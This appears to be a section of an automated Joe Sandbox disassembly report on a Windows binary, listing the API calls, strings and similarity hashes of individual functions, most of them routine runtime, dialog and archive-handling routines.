                                                                  • Opcode Fuzzy Hash: 4104b46a10aff17171dbb1937de64fe40274e4dd599dac10c3b2677c99727404
                                                                  • Instruction Fuzzy Hash: A701AD36900609B7C7126BB4DC0EFAF7AB99BC4B5AF090019FD10A7291DF218E0656B2
                                                                  APIs
                                                                    • Part of subcall function 00CB1316: GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
                                                                    • Part of subcall function 00CB1316: SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370
                                                                  • EndDialog.USER32(?,00000001), ref: 00CCD64B
                                                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CCD661
                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CCD675
                                                                  • SetDlgItemTextW.USER32(?,00000068), ref: 00CCD684
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ItemText$DialogWindow
                                                                  • String ID: RENAMEDLG
                                                                  • API String ID: 445417207-3299779563
                                                                  • Opcode ID: dca8f9d97654272007e82a061b734c2678626385b0fe77f97105d30e3bb853f7
                                                                  • Instruction ID: a67ac1858e573fa46b439ab1add9a4f5f9244f8516a86f78708921338c14a209
                                                                  • Opcode Fuzzy Hash: dca8f9d97654272007e82a061b734c2678626385b0fe77f97105d30e3bb853f7
                                                                  • Instruction Fuzzy Hash: 8D012D33244314BAD2208F65DD49F9777ACEB5A702F114828F306E21D5C7A19A15C779
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CD7E24,?,?,00CD7DC4,?,00CEC300,0000000C,00CD7F1B,?,00000002), ref: 00CD7E93
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CD7EA6
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00CD7E24,?,?,00CD7DC4,?,00CEC300,0000000C,00CD7F1B,?,00000002,00000000), ref: 00CD7EC9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: f1d7346cdb5bf5a57d54879a98af88bffbc9fd1a805a10f730be676b38599cae
                                                                  • Instruction ID: 2002c87fe997fad7d61486c5cbff18de43a77c804b4ae85a9c4561dc96e4e5b8
                                                                  • Opcode Fuzzy Hash: f1d7346cdb5bf5a57d54879a98af88bffbc9fd1a805a10f730be676b38599cae
                                                                  • Instruction Fuzzy Hash: 59F04F31A00258BFDB119BA1DC4DBAEBFB5EB44755F0041A9F905AB2A0DB30AF40CA90
                                                                  APIs
                                                                    • Part of subcall function 00CC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CC0836
                                                                    • Part of subcall function 00CC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CBF2D8,Crypt32.dll,00000000,00CBF35C,?,?,00CBF33E,?,?,?), ref: 00CC0858
                                                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CBF2E4
                                                                  • GetProcAddress.KERNEL32(00CF81C8,CryptUnprotectMemory), ref: 00CBF2F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                  • API String ID: 2141747552-1753850145
                                                                  • Opcode ID: 4cb4760df2b59ca3f625082d0240bf51108a83a190b6cac51495ba3e319ca60a
                                                                  • Instruction ID: 7f692bb9ac4d7451740c99b252e9cb634e01cd04790a9c4f6a8349f8795ddac8
                                                                  • Opcode Fuzzy Hash: 4cb4760df2b59ca3f625082d0240bf51108a83a190b6cac51495ba3e319ca60a
                                                                  • Instruction Fuzzy Hash: 21E04F709107C19EDB209B75984DB457AD46F04700F14887DE0DA93650D6B4E6819B50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustPointer$_abort
                                                                  • String ID:
                                                                  • API String ID: 2252061734-0
                                                                  • Opcode ID: 968b81a46b9748b876eca101c81f801b2dc932c94cfd7fce07c06cc76ebb42ba
                                                                  • Instruction ID: ab56693f2b163f93fdf539d3092edbea44cf2d19c242417bb0f663a790938e54
                                                                  • Opcode Fuzzy Hash: 968b81a46b9748b876eca101c81f801b2dc932c94cfd7fce07c06cc76ebb42ba
                                                                  • Instruction Fuzzy Hash: 66510771600212AFEB298F14D945BBAB3A5FFA4310F24412FEE11473A1D732EE41E790
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00CDBF39
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CDBF5C
                                                                    • Part of subcall function 00CD8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CD4286,?,0000015D,?,?,?,?,00CD5762,000000FF,00000000,?,?), ref: 00CD8E38
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CDBF82
                                                                  • _free.LIBCMT ref: 00CDBF95
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CDBFA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                  • String ID:
                                                                  • API String ID: 336800556-0
                                                                  • Opcode ID: 90f94f2790ff2e590d2c78ddbb33e283cd230210b7df1029fe403996d20f6a61
                                                                  • Instruction ID: fd8025caa2aad35e79d3755497eb072cb55bb15dbd6361ad8f687ed1fd87350e
                                                                  • Opcode Fuzzy Hash: 90f94f2790ff2e590d2c78ddbb33e283cd230210b7df1029fe403996d20f6a61
                                                                  • Instruction Fuzzy Hash: 2201B16A601251BF272117BB5C8DD7F6A6DDEC6BA0316012EFA04C7340EF608E0195B0
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,00CD91AD,00CDB188,?,00CD9813,00000001,00000364,?,00CD40EF,?,?,00CF1098), ref: 00CD986E
                                                                  • _free.LIBCMT ref: 00CD98A3
                                                                  • _free.LIBCMT ref: 00CD98CA
                                                                  • SetLastError.KERNEL32(00000000,?,00CF1098), ref: 00CD98D7
                                                                  • SetLastError.KERNEL32(00000000,?,00CF1098), ref: 00CD98E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free
                                                                  • String ID:
                                                                  • API String ID: 3170660625-0
                                                                  • Opcode ID: 9064942ad1ea3bac88c487aa0fc67ec5a17fc46fa444a1bc2a193f34e72dd3f3
                                                                  • Instruction ID: 60547f88407d7c286d977c96a5d0e831fe46cc5e2b222af3a57b1bb775d5e47c
                                                                  • Opcode Fuzzy Hash: 9064942ad1ea3bac88c487aa0fc67ec5a17fc46fa444a1bc2a193f34e72dd3f3
                                                                  • Instruction Fuzzy Hash: 1C01D13A2447416BC3122625ACC9B2E266ADBD2B70F210137F725963E2EE358E05B621
                                                                  APIs
                                                                    • Part of subcall function 00CC11CF: ResetEvent.KERNEL32(?), ref: 00CC11E1
                                                                    • Part of subcall function 00CC11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CC11F5
                                                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CC0F21
                                                                  • CloseHandle.KERNEL32(?,?), ref: 00CC0F3B
                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00CC0F54
                                                                  • CloseHandle.KERNEL32(?), ref: 00CC0F60
                                                                  • CloseHandle.KERNEL32(?), ref: 00CC0F6C
                                                                    • Part of subcall function 00CC0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00CC1101,?,?,00CC117F,?,?,?,?,?,00CC1169), ref: 00CC0FEA
                                                                    • Part of subcall function 00CC0FE4: GetLastError.KERNEL32(?,?,00CC117F,?,?,?,?,?,00CC1169), ref: 00CC0FF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                  • String ID:
                                                                  • API String ID: 1868215902-0
                                                                  • Opcode ID: a75e2dd62344080db81ea8b35f2419b35ec5ad4a931ff9d23445c58b0103dd51
                                                                  • Instruction ID: 2ab979e83fb9f3bd354b32865300f3db6076beaba40b2ff39a85a321811294f9
                                                                  • Opcode Fuzzy Hash: a75e2dd62344080db81ea8b35f2419b35ec5ad4a931ff9d23445c58b0103dd51
                                                                  • Instruction Fuzzy Hash: FA015E72500784EFC7229BA5DC88FDABBA9FB08710F10096DF26B92160CB757A45DA54
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00CDC817
                                                                    • Part of subcall function 00CD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?), ref: 00CD8DE2
                                                                    • Part of subcall function 00CD8DCC: GetLastError.KERNEL32(?,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?,?), ref: 00CD8DF4
                                                                  • _free.LIBCMT ref: 00CDC829
                                                                  • _free.LIBCMT ref: 00CDC83B
                                                                  • _free.LIBCMT ref: 00CDC84D
                                                                  • _free.LIBCMT ref: 00CDC85F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 08b56384e07bf9043e7adb9daaac1e20ca79e8393e8ac01ab6bf087c336b326b
                                                                  • Instruction ID: f64da68d9e4b14b18ad5a3518108c8b296d8e2301dadb8d2a4ba3cef8fc86016
                                                                  • Opcode Fuzzy Hash: 08b56384e07bf9043e7adb9daaac1e20ca79e8393e8ac01ab6bf087c336b326b
                                                                  • Instruction Fuzzy Hash: 8CF01232504252BB8720DB68E8C5E1B73EAAA447547541C1BF318DB7D2CB70FD80DA54
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00CC1FE5
                                                                  • _wcslen.LIBCMT ref: 00CC1FF6
                                                                  • _wcslen.LIBCMT ref: 00CC2006
                                                                  • _wcslen.LIBCMT ref: 00CC2014
                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CBB371,?,?,00000000,?,?,?), ref: 00CC202F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$CompareString
                                                                  • String ID:
                                                                  • API String ID: 3397213944-0
                                                                  • Opcode ID: 284ba25a1484f5042349f04b9243cf0b072dc6a036ca4ad64834bd50292673d6
                                                                  • Instruction ID: 3de5173546ccf3495f35fc71a8b0d202c7c7abf9adb17629439e54da55e9c8b4
                                                                  • Opcode Fuzzy Hash: 284ba25a1484f5042349f04b9243cf0b072dc6a036ca4ad64834bd50292673d6
                                                                  • Instruction Fuzzy Hash: 66F01D32008054BBCF225F51EC49E8E7F26EB44760B11841BF61A5B5A2CB729662E691
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00CD891E
                                                                    • Part of subcall function 00CD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?), ref: 00CD8DE2
                                                                    • Part of subcall function 00CD8DCC: GetLastError.KERNEL32(?,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?,?), ref: 00CD8DF4
                                                                  • _free.LIBCMT ref: 00CD8930
                                                                  • _free.LIBCMT ref: 00CD8943
                                                                  • _free.LIBCMT ref: 00CD8954
                                                                  • _free.LIBCMT ref: 00CD8965
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: d86452d6e12b9c96b0cb1a1d29bde8644009ac17cdcd80ff00dc7e22dfd9a7c4
                                                                  • Instruction ID: 6b4c85d36172ae6b77a151e13e6909d4790d0fad96b36db4fdea384609fc2325
                                                                  • Opcode Fuzzy Hash: d86452d6e12b9c96b0cb1a1d29bde8644009ac17cdcd80ff00dc7e22dfd9a7c4
                                                                  • Instruction Fuzzy Hash: 0EF06770800326BB86026F24FC025AE3BA2F728720300410AF254863F5CF334966ABA4
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _swprintf
                                                                  • String ID: %ls$%s: %s
                                                                  • API String ID: 589789837-2259941744
                                                                  • Opcode ID: 83491f98746cd41e5e91289c075aa17a887827be67e7ce19d2c6aa2311715fb9
                                                                  • Instruction ID: 18b21014eb2a5dc436a528c1d3db54adea3e49f15946920719484581bb76dde7
                                                                  • Opcode Fuzzy Hash: 83491f98746cd41e5e91289c075aa17a887827be67e7ce19d2c6aa2311715fb9
                                                                  • Instruction Fuzzy Hash: 3751063528C304FAE6261AA3CD46F757265EB07F04F2C450EFF96644E3C9A2A910B75B
                                                                  APIs
                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CD31FB
                                                                  • _abort.LIBCMT ref: 00CD3306
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: EncodePointer_abort
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 948111806-2084237596
                                                                  • Opcode ID: 20be977a0f1baead93fd68e7498d5dccf5bb3f43b3be024fa34972d4b24b2762
                                                                  • Instruction ID: 5693c5de8ecb71ce425a67caf53b033d9501cec511a18b20554276c8d4e1e60d
                                                                  • Opcode Fuzzy Hash: 20be977a0f1baead93fd68e7498d5dccf5bb3f43b3be024fa34972d4b24b2762
                                                                  • Instruction Fuzzy Hash: B8414871D00249AFCF15DF98CD81AAEBBB5FF48304F18805AFA14A7262D335EA51DB51
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CB7406
                                                                    • Part of subcall function 00CB3BBA: __EH_prolog.LIBCMT ref: 00CB3BBF
                                                                  • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00CB74CD
                                                                    • Part of subcall function 00CB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CB7AAB
                                                                    • Part of subcall function 00CB7A9C: GetLastError.KERNEL32 ref: 00CB7AF1
                                                                    • Part of subcall function 00CB7A9C: CloseHandle.KERNEL32(?), ref: 00CB7B00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                  • API String ID: 3813983858-639343689
                                                                  • Opcode ID: 465d5aac645878d9250e77a76627557902ca5bc8e8db025f0d6d886619383de6
                                                                  • Instruction ID: b7209ba43b8b0d2a72870d63f10ff004baa0fae14598e778565b8cb387cd8d63
                                                                  • Opcode Fuzzy Hash: 465d5aac645878d9250e77a76627557902ca5bc8e8db025f0d6d886619383de6
                                                                  • Instruction Fuzzy Hash: 8A31B471D04288AADF21EBA4DC45FFE7BA9AF45304F044159FC15E7282CB749B48DB61
                                                                  APIs
                                                                    • Part of subcall function 00CB1316: GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
                                                                    • Part of subcall function 00CB1316: SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370
                                                                  • EndDialog.USER32(?,00000001), ref: 00CCAD98
                                                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CCADAD
                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CCADC2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ItemText$DialogWindow
                                                                  • String ID: ASKNEXTVOL
                                                                  • API String ID: 445417207-3402441367
                                                                  • Opcode ID: bfbc5eb7c292f614ed0d6411ba630869edb8b5ae5a070e2b95b0e6dc30acd1f6
                                                                  • Instruction ID: aa43c75ac00a200c5f62a3ddcdabf28b78a9eb75e7a89d0a004b99b4fe21d129
                                                                  • Opcode Fuzzy Hash: bfbc5eb7c292f614ed0d6411ba630869edb8b5ae5a070e2b95b0e6dc30acd1f6
                                                                  • Instruction Fuzzy Hash: 6B110332284304BFD3118F68DC0CFEA7BA9EB0A74AF000014F342DB5A0CB619A529776
                                                                  APIs
